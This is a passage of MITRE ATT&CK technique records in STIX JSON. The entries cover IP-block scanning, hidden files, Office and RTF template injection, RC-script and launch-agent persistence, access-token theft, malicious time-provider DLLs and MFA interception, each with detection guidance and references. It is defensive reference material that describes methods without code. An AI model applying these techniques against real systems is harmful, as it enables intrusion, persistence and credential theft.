"object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Scanning IP Blocks", "description": "Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.\n\nAdversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120", "created": "2020-10-02T16:54:23.193Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1595/001", "external_id": "T1595.001"}, {"source_name": "Botnet Scan", "description": "Dainotti, A. et al. (2012). Analysis of a \u201c/0\u201d Stealth Scan from a Botnet. Retrieved October 20, 2020.", "url": "https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Hidden Files and Directories", "description": "To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a \u2018hidden\u2019 file. These files don\u2019t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls \u2013a for Linux and macOS).\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.\n\n### Windows\n\nUsers can mark specific files as hidden by using the attrib.exe binary. Simply do attrib +h filename to mark a file or folder as hidden. Similarly, the \u201c+s\u201d marks a file as a system file and the \u201c+r\u201d flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively \u201c/S\u201d.\n\n### Linux/Mac\n\nUsers can mark specific files as hidden simply by putting a \u201c.\u201d as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, \u2018.\u2019, are by default hidden from being viewed in the Finder application and standard command-line utilities like \u201cls\u201d. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: defaults write com.apple.finder AppleShowAllFiles YES, and then relaunch the Finder Application.\n\n### Mac\n\nFiles on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker).\nMany applications create these hidden files and folders to store information so that it doesn\u2019t clutter up the user\u2019s workspace. For example, SSH utilities create a .ssh folder that\u2019s hidden and contains the user\u2019s known hosts and keys.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Host forensic analysis"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--dc27c2ec-c5f9-4228-ba57-d67b590bda93", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1158", "external_id": "T1158"}, {"source_name": "Sofacy Komplex Trojan", "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"}, {"source_name": "Antiquated Mac Malware", "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"}, {"source_name": "WireLurker", "description": "Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware. Retrieved July 10, 2017.", "url": "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Template Injection", "description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft\u2019s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)\n\nAdversaries may also modify the *\\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Michael Raggi @aRtAGGI", "Brian Wiltse @evalstrings", "Patrick Campbell, @pjcampbe11"], "x_mitre_detection": "Analyze process behavior to determine if user document applications (such as Office) are performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.\n\nMonitor .rtf files for strings indicating the *\\template control word has been modified to retrieve a URL resource, such as *\\template http or *\\template \\u-.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Static File Analysis"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", "created": "2018-10-17T00:14:20.652Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1221", "external_id": "T1221"}, {"source_name": "Microsoft Open XML July 2017", "description": "Microsoft. (2014, July 9). Introducing the Office (2007) Open XML File Formats. Retrieved July 20, 2018.", "url": "https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)"}, {"source_name": "SANS Brian Wiltse Template Injection", "description": "Wiltse, B.. (2018, November 7). Template Injection Attacks - Bypassing Security Controls by Living off the Land. Retrieved April 10, 2019.", "url": "https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780"}, {"source_name": "Redxorblue Remote Template Injection", "description": "Hawkins, J. (2018, July 18). Executing Macros From a DOCX With Remote Template Injection. Retrieved October 12, 2018.", "url": "http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html"}, {"source_name": "MalwareBytes Template Injection OCT 2017", "description": "Segura, J. (2017, October 13). Decoy Microsoft Word document delivers malware through a RAT. Retrieved July 21, 2018.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/"}, {"source_name": "Proofpoint RTF Injection", "description": "Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption\u202fBeyond APT Actors\u202f. Retrieved December 9, 2021.", "url": "https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread"}, {"source_name": "Ciberseguridad Decoding malicious RTF files", "description": "Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021.", "url": "https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/"}, {"source_name": "Anomali Template Injection MAR 2018", "description": "Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018.", "url": "https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104"}, {"source_name": "Talos Template Injection July 2017", "description": "Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.", "url": "https://blog.talosintelligence.com/2017/07/template-injection.html"}, {"source_name": "ryhanson phishery SEPT 2016", "description": "Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.", "url": "https://github.com/ryhanson/phishery"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T12:22:29.150Z", "name": "RC Scripts", "description": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system\u2019s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.\n\nAdversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.\n\nAdversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)\n\nSeveral Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for unexpected changes to RC scripts in the /etc/ directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.\n\nMonitor for /etc/rc.local file creation. Although types of RC scripts vary for each Unix-like distribution, several execute /etc/rc.local if present. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Linux", "Network"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", "created": "2020-01-15T16:25:22.260Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1037/004", "external_id": "T1037.004"}, {"source_name": "Apple Developer Doco Archive Launchd", "description": "Apple. (2016, September 13). Daemons and Services Programming Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021.", "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"}, {"source_name": "Startup Items", "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html"}, {"source_name": "Ubuntu Manpage systemd rc", "description": "Canonical Ltd.. (n.d.). systemd-rc-local-generator - Compatibility generator for starting /etc/rc.local and /usr/sbin/halt.local during boot and shutdown. Retrieved February 23, 2021.", "url": "http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html"}, {"source_name": "IranThreats Kittens Dec 2017", "description": "Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code. Retrieved May 28, 2020.", "url": "https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/"}, {"source_name": "Methods of Mac Malware Persistence", "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "intezer-kaiji-malware", "description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020.", "url": "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/"}, {"source_name": "Intezer HiddenWasp Map 2019", "description": "Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.", "url": "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Access Token Manipulation", "description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)\n\nAny standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Tom Ueltschi @c_APT_ure", "Travis Smith, Tripwire", "Robby Winchester, @robwinchester3", "Jared Atkinson, @jaredcatkinson"], "x_mitre_deprecated": false, "x_mitre_detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\n\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. \n\nThere are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.\n\nQuery systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\n\nLook for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Windows User Account Control", "Heuristic Detection", "System Access Controls", "Host Forensic Analysis"], "x_mitre_effective_permissions": ["SYSTEM"], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1134", "external_id": "T1134"}, {"source_name": "BlackHat Atkinson Winchester Token Manipulation", "description": "Atkinson, J., Winchester, R. (2017, December 7). A Process is No One: Hunting for Token Manipulation. Retrieved December 21, 2017.", "url": "https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf"}, {"source_name": "Microsoft Command-line Logging", "description": "Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.", "url": "https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing"}, {"source_name": "Microsoft LogonUser", "description": "Microsoft TechNet. (n.d.). Retrieved April 25, 2017.", "url": "https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx"}, {"source_name": "Microsoft DuplicateTokenEx", "description": "Microsoft TechNet. (n.d.). Retrieved April 25, 2017.", "url": "https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx"}, {"source_name": "Microsoft ImpersonateLoggedOnUser", "description": "Microsoft TechNet. (n.d.). Retrieved April 25, 2017.", "url": "https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx"}, {"source_name": "Pentestlab Token Manipulation", "description": "netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017.", "url": "https://pentestlab.blog/2017/04/03/token-manipulation/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Time Providers", "description": "The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)\n\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)\n\nAdversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Scott Lundgren, @5twenty9, Carbon Black"], "x_mitre_detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)\n\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--dce31a00-1e90-4655-b0f9-e2e71a748a87", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1209", "external_id": "T1209"}, {"source_name": "Microsoft W32Time Feb 2018", "description": "Microsoft. (2018, February 1). Windows Time Service (W32Time). Retrieved March 26, 2018.", "url": "https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top"}, {"source_name": "Microsoft TimeProvider", "description": "Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx"}, {"source_name": "Github W32Time Oct 2017", "description": "Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018.", "url": "https://github.com/scottlundgren/w32time"}, {"source_name": "Microsoft W32Time May 2017", "description": "Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. Retrieved March 26, 2018.", "url": "https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Multi-Factor Authentication Interception", "description": "Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users\u2019 phones.(Citation: Okta Scatter Swine 2022)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["John Lambert, Microsoft Threat Intelligence Center"], "x_mitre_deprecated": false, "x_mitre_detection": "Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.\n\nSimilar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", "created": "2017-05-31T21:31:23.195Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1111", "external_id": "T1111"}, {"source_name": "GCN RSA June 2011", "description": "Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved September 24, 2018.", "url": "https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/"}, {"source_name": "Mandiant M Trends 2011", "description": "Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved January 10, 2016.", "url": "https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf"}, {"source_name": "Okta Scatter Swine 2022", "description": "Okta. (2022, August 25). Detecting Scatter Swine: Insights into a Relentless Phishing Campaign. Retrieved February 24, 2023.", "url": "https://sec.okta.com/scatterswine"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Launch Agent", "description": "Per Apple\u2019s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in /System/Library/LaunchAgents, /Library/LaunchAgents, and $HOME/Library/LaunchAgents (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).\n \nAdversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories (Citation: Sofacy Komplex Trojan) (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user\u2019s directory structure) or when any user logs in (which requires administrator privileges).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor Launch Agent creation through additional plist files and utilities such as Objective-See\u2019s KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--dd901512-6e37-4155-943b-453e3777b125", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1159", "external_id": "T1159"}, {"source_name": "AppleDocs Launch Agent Daemons", "description": "Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved July 10, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html"}, {"source_name": "OSX Keydnap malware", "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"}, {"source_name": "Antiquated Mac Malware", "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"}, {"source_name": "OSX.Dok Malware", "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/"}, {"source_name": "Sofacy Komplex Trojan", "description": "Dani Creus, Tyler Halfpop, 